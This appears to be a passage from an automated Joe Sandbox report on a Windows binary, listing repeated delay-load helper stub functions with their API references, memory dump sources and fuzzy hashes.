                                                                                              • Opcode ID: c35b3e89e558720021c4ae216410512c7f7cdf94dc4ef96509d03a5f9424f6bb
                                                                                              • Instruction ID: 391aebd2470cfeb1def2727f12d33a6777626d6dd278d4269ce127717c2a6ffc
                                                                                              • Opcode Fuzzy Hash: c35b3e89e558720021c4ae216410512c7f7cdf94dc4ef96509d03a5f9424f6bb
                                                                                              • Instruction Fuzzy Hash: 6CB012C12D9401BE3104620D1C02EFB014DC0C1F14730413FF508C02C0E8404C095432
                                                                                              Function 00CBE2CD Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 343a50dee50dd2ab0461675546b854fcd8e48ca690a3688a963b5b671772fbdd
                                                                                              • Instruction ID: 86f8ca01527850f7b079e2e337c3e8d453b0fd7d7904f77cca36dc65b69e7eaf
                                                                                              • Opcode Fuzzy Hash: 343a50dee50dd2ab0461675546b854fcd8e48ca690a3688a963b5b671772fbdd
                                                                                              • Instruction Fuzzy Hash: 21A001E62AD552BC3908625A6D46CFB025EC4C5F65B30C93EF916C45C2A891AC45A871
                                                                                              Function 00CBE2C3 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 5c02a0c3255612935286deb5e843c401cdfc3d69b522b37c4f918f54390c3314
                                                                                              • Instruction ID: 86f8ca01527850f7b079e2e337c3e8d453b0fd7d7904f77cca36dc65b69e7eaf
                                                                                              • Opcode Fuzzy Hash: 5c02a0c3255612935286deb5e843c401cdfc3d69b522b37c4f918f54390c3314
                                                                                              • Instruction Fuzzy Hash: 21A001E62AD552BC3908625A6D46CFB025EC4C5F65B30C93EF916C45C2A891AC45A871
                                                                                              Function 00CBE2D7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: f8d5455651922a69de391e34ac36ec20c49933b600b482330fd56e2e8c93a5f7
                                                                                              • Instruction ID: 86f8ca01527850f7b079e2e337c3e8d453b0fd7d7904f77cca36dc65b69e7eaf
                                                                                              • Opcode Fuzzy Hash: f8d5455651922a69de391e34ac36ec20c49933b600b482330fd56e2e8c93a5f7
                                                                                              • Instruction Fuzzy Hash: 21A001E62AD552BC3908625A6D46CFB025EC4C5F65B30C93EF916C45C2A891AC45A871
                                                                                              Function 00CBE29B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 6b94d124fe68e2af3fe792b5b8548ab9bd12068c4969abef2cd4b8116be88ae0
                                                                                              • Instruction ID: 86f8ca01527850f7b079e2e337c3e8d453b0fd7d7904f77cca36dc65b69e7eaf
                                                                                              • Opcode Fuzzy Hash: 6b94d124fe68e2af3fe792b5b8548ab9bd12068c4969abef2cd4b8116be88ae0
                                                                                              • Instruction Fuzzy Hash: 21A001E62AD552BC3908625A6D46CFB025EC4C5F65B30C93EF916C45C2A891AC45A871
                                                                                              Function 00CBE291 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 5683f5fa2d9626c37b937b8c1613e826389c1a83fe18cdce2ef31e3dd27db669
                                                                                              • Instruction ID: 86f8ca01527850f7b079e2e337c3e8d453b0fd7d7904f77cca36dc65b69e7eaf
                                                                                              • Opcode Fuzzy Hash: 5683f5fa2d9626c37b937b8c1613e826389c1a83fe18cdce2ef31e3dd27db669
                                                                                              • Instruction Fuzzy Hash: 21A001E62AD552BC3908625A6D46CFB025EC4C5F65B30C93EF916C45C2A891AC45A871
                                                                                              Function 00CBE2AF Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 88e3e30054568c33a99fb0da7f79058d12422e9269b444fcc1d695f14d055742
                                                                                              • Instruction ID: 86f8ca01527850f7b079e2e337c3e8d453b0fd7d7904f77cca36dc65b69e7eaf
                                                                                              • Opcode Fuzzy Hash: 88e3e30054568c33a99fb0da7f79058d12422e9269b444fcc1d695f14d055742
                                                                                              • Instruction Fuzzy Hash: 21A001E62AD552BC3908625A6D46CFB025EC4C5F65B30C93EF916C45C2A891AC45A871
                                                                                              Function 00CBE2A5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: c63312fa77354543997a78457c40293544c7e703447cce3e4703c0bf070e177c
                                                                                              • Instruction ID: 86f8ca01527850f7b079e2e337c3e8d453b0fd7d7904f77cca36dc65b69e7eaf
                                                                                              • Opcode Fuzzy Hash: c63312fa77354543997a78457c40293544c7e703447cce3e4703c0bf070e177c
                                                                                              • Instruction Fuzzy Hash: 21A001E62AD552BC3908625A6D46CFB025EC4C5F65B30C93EF916C45C2A891AC45A871
                                                                                              Function 00CBE2B9 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 89727fa9270389b9304f61694b2967a9cc25a75777185b04dd3d74df0a491902
                                                                                              • Instruction ID: 86f8ca01527850f7b079e2e337c3e8d453b0fd7d7904f77cca36dc65b69e7eaf
                                                                                              • Opcode Fuzzy Hash: 89727fa9270389b9304f61694b2967a9cc25a75777185b04dd3d74df0a491902
                                                                                              • Instruction Fuzzy Hash: 21A001E62AD552BC3908625A6D46CFB025EC4C5F65B30C93EF916C45C2A891AC45A871
                                                                                              Function 00CBE25F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 31211973cf3c33849dbd6b971c243b4fd8330c833b68e3e515827bc9ad06f13e
                                                                                              • Instruction ID: 86f8ca01527850f7b079e2e337c3e8d453b0fd7d7904f77cca36dc65b69e7eaf
                                                                                              • Opcode Fuzzy Hash: 31211973cf3c33849dbd6b971c243b4fd8330c833b68e3e515827bc9ad06f13e
                                                                                              • Instruction Fuzzy Hash: 21A001E62AD552BC3908625A6D46CFB025EC4C5F65B30C93EF916C45C2A891AC45A871
                                                                                              Function 00CBE27D Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: e7ee85e613b45c66352e929dc40d4c8a21ca593af93a097ecc526be381505cc0
                                                                                              • Instruction ID: 86f8ca01527850f7b079e2e337c3e8d453b0fd7d7904f77cca36dc65b69e7eaf
                                                                                              • Opcode Fuzzy Hash: e7ee85e613b45c66352e929dc40d4c8a21ca593af93a097ecc526be381505cc0
                                                                                              • Instruction Fuzzy Hash: 21A001E62AD552BC3908625A6D46CFB025EC4C5F65B30C93EF916C45C2A891AC45A871
                                                                                              Function 00CBE219 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 90fec3aec0d2bae908abbaca2a45468d0f3bed9514e3b3ada8d2a4c58d577e0e
                                                                                              • Instruction ID: 86f8ca01527850f7b079e2e337c3e8d453b0fd7d7904f77cca36dc65b69e7eaf
                                                                                              • Opcode Fuzzy Hash: 90fec3aec0d2bae908abbaca2a45468d0f3bed9514e3b3ada8d2a4c58d577e0e
                                                                                              • Instruction Fuzzy Hash: 21A001E62AD552BC3908625A6D46CFB025EC4C5F65B30C93EF916C45C2A891AC45A871
                                                                                              Function 00CBE3EF Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE3FC
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: a75701d738336d1f177580bb54f34baa2d275ae47c6a96efeb80aa9c3aff0495
                                                                                              • Instruction ID: 40be3938acde55064429fedaa63ebf63c0b7ae5a423d0fdb3be58e557473fe60
                                                                                              • Opcode Fuzzy Hash: a75701d738336d1f177580bb54f34baa2d275ae47c6a96efeb80aa9c3aff0495
                                                                                              • Instruction Fuzzy Hash: 60A011E22A80023C3A0822022C82CFB028EC0C0F28B30802EF820A00C0AC800C02A8B2
                                                                                              Function 00CBE446 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE3FC
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: c3ef2273dc2896f76bf52f22204063e5f99dabf58288bee628e50d7e8d1424bb
                                                                                              • Instruction ID: 4acc3b76ffa8c2a5053a67c09a9ba7558301284ad57c10c9220053264e6e2197
                                                                                              • Opcode Fuzzy Hash: c3ef2273dc2896f76bf52f22204063e5f99dabf58288bee628e50d7e8d1424bb
                                                                                              • Instruction Fuzzy Hash: F1A011E22A8002BC3A0822022C82CFB028EC0C0F20B30882EF802800C0A8800C02A8B2
                                                                                              Function 00CBE40A Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE3FC
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
